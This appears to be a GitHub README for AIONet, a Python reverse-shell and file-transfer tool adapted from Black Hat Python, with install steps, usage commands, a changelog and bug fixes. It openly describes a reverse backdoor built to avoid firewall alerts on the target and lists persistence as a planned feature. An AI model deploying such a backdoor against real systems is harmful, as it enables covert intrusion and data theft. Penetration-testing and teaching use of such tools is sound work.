AIONet was built as a multipurpose tool to replace netcat. Written in Python3, AIONet offers features like reverse shell spawning, file upload and file download.
The idea for this tool was obtained from chapter 2 of Black Hat Python by Justin Seitz. This program aims to update BHP's tool to provide features like class-based structure, Python3 support and error checking. A detailed explanation of the differences between the two can be found at the end of this document.

• Python3 (>=3.6)

git clone https://github.com/aarole/aionet.git
cd aionet/

wget -O aionet.py https://raw.githubusercontent.com/aarole/aionet/master/aionet.py

An AIONet listener can be created by using an existing Docker image or by building your own.

docker pull aarole/aionet

git clone https://github.com/aarole/aionet.git
cd aionet/
docker build -t aarole/aionet .

docker run --rm -it -v /path/to/some/directory:/opt -p PORT:PORT aarole/aionet -l -p PORT

• /path/to/some/directory
  • Directory (a) containing the files you may want to upload, or (b) to which you may want to download files
  • Directory path should be on your Docker host
• PORT
  • Port on which the listener will listen
  • Use the same port in all three locations

On host:           python3 aionet.py -p PORT -l
On remote machine: python3 aionet.py -t TARGET -p PORT

Options:
-t target, --target target IP address of the remote listener
-p port, --port port       If used with -l, port where listener is to be created; else, port where remote listener exists
-l, --listen               Create a listener on the port defined using -p
-h, --help                 show this help message and exit

• Program structure overhauled to allow for easy extension
  • Created individual classes for the server (listener/host) and the client (target/remote machine)
• Updated program to use reverse backdoors
  • Listener is created on the physical machine and remote target connects to it
  • Opening a port on the host ensures that firewalls on the remote target do not raise red flags
• Replaced getopt with argparse
• Moved file manipulation (download and upload) to post-shell operations
  • Used the base64 library to encode files during upload/download
  • Base64 encoding allows for easy transfer of files (especially non-text [pdf, png, jpg] files)
• Used the os library to allow for usage of cd and rm commands
• Added error-checking during file upload/download using SHA256 hashes (provided by hashlib)
  • Hash is sent from the source computer along with the message
  • The destination hashes the file locally
  • If the hashes match, the file is downloaded/uploaded; else, the file is deleted
• Added server-side logging
  • If the shell is dropped, all commands run and their respective output is stored in a timestamped log file

• Add support for bind shells
• Add ability to establish persistence

• File download
  • Non-text files (png, jpg, pdf) cause errors when downloading them
  • Files are partially downloaded and a part of the base64 encoded file is printed
  • Fix: Switched from length-based recv to sentinel-based recv
• Exit condition
  • exit command is not handled properly on the server
  • Fix: Moved handle() call in Server class to outside the while loop
• Downloading files with full path
  • Supplying the absolute path to a file being downloaded could potentially cause conflict issues on the host
  • Fix: Added a line to replace "/" with "_" to allow the user to download files by providing an absolute path without encountering conflict issues and maintaining the full path string in the downloaded file for their reference